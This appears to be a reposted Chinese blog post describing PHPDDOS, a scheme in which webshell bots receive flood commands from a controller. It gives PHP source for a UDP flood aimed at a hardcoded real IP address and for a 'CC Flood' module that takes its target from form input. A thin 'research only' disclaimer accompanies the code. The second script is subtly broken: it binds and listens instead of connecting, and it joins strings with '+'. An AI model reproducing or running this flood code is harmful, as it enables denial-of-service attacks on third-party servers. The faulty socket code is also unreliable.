PHP使用UDP发包,PHPDDOS,PHP攻击

简介: PHP使用UDP发包,PHPDDOS,PHP攻击

PHPDDOS的原理是使用一个主控端批量向被控端(也就是特殊的webshell)发送攻击命令,方式一般是get或者post,达到统一指挥的目的。而被控端一般使用了php中的sock来进行攻击。用过末日DDOS工具应该了解,攻击效果显著。
【一】。UDP源码

<?php
$packets = 0;
$ip = '116.255.242.14';
$port = 80;
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = '60';
$time = time();
echo '状态 : 正常运行中.....<br><br>';
$max_time = $time+$exec_time;
$out=null;
for($i=0;$i<65535;$i++){
        $out .= 't';
}
 
while(true){
$packets++;
        if(time() > $max_time){
                break;
        }
 
        $fp = fsockopen("udp://$ip", $port, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "  攻击包时长:<font color=Red><span class=\"text\">".$exec_time." 秒</span><br><br></font>";
echo "  攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";
echo "    攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";
echo "  攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";
echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

【二】。CC源码

<?php
echo "状态 : 正常运行中.....<br>";
echo "================================================<br>";
echo "  <font color=blue>www.phpddos.com<br>";
echo "  CC Flood 模块<br>";
echo "  作者:ybhacker<br>";
echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";
echo "================================================<br><br>";
error_reporting(E_ALL);  //提示错误信息
set_time_limit(0);     //设定一个程式所允许执行的秒数   0 是无限循环
ob_implicit_flush();     // 刷新输出缓冲
$address = $_POST['site'];  // 网站地址
$port = $_POST['port'];      // 端口
$dongu = $_POST['dongu'];   //循环次数
$sayi = 1;   

while ( $sayi <= $dongu )   //变量asyi小于 循环次数变量 dongu 才会继续循环
{
    if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
        echo "HaHa\n";
    }

    if (socket_bind($sock, $address, $port) === false) {       // 连接端口
        echo "HaHa\n";
    }

    if (socket_listen($sock, 5) === false) {
        echo "HaHa\n";
    }
        $msg = "HTTP/1.1 GET /\r\nHost:"+$_GET['site']+"\r\nConnection: Keep-Alive\r\n";
        socket_write($msg);
        socket_close($sock);
        $sayi++;   // 循环一次 变量sayi 加1
        echo "Goodbye...".$sayi;   // 输出循环次数
}
?>
目录
相关文章
|
2月前
|
缓存 网络协议 网络性能优化
【计算机网络-传输层】TCP/UDP、SYN泛洪攻击、三次握手四次挥手
【计算机网络-传输层】TCP/UDP、SYN泛洪攻击、三次握手四次挥手
|
7月前
|
SQL 安全 JavaScript
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
102 0
|
9月前
|
安全 PHP
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
115 0
|
缓存 网络协议 安全
网络安全-DoS与DDoS攻击原理(TCP、UDP、CC攻击等)与防御
网络安全-DoS与DDoS攻击原理(TCP、UDP、CC攻击等)与防御
567 0
|
Web App开发 SQL PHP
PHP获取IP地址的方法,防止伪造IP地址注入攻击
原文:PHP获取IP地址的方法,防止伪造IP地址注入攻击 PHP获取IP地址的方法 /** * 获取客户端IP地址 * 来源:ThinkPHP * "X-FORWARDED-FOR" 是代理服务器通过 HTTP Headers 提供的客户端IP。
2014 0
|
安全 测试技术 区块链
游戏安全资讯精选 2018年第八期:3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
5903 0
|
Web App开发 安全 测试技术
【重要安全预警】Memcached被利用UDP反射攻击漏洞预警
本周,阿里云安全中心监测到互联网上存在利用Memcached服务漏洞进行的恶意攻击。如果客户默认开放UDP协议且未做访问控制,在运行Memcached服务时可能会被黑客利用,导致出方向的带宽消耗或CPU资源消耗。
8424 0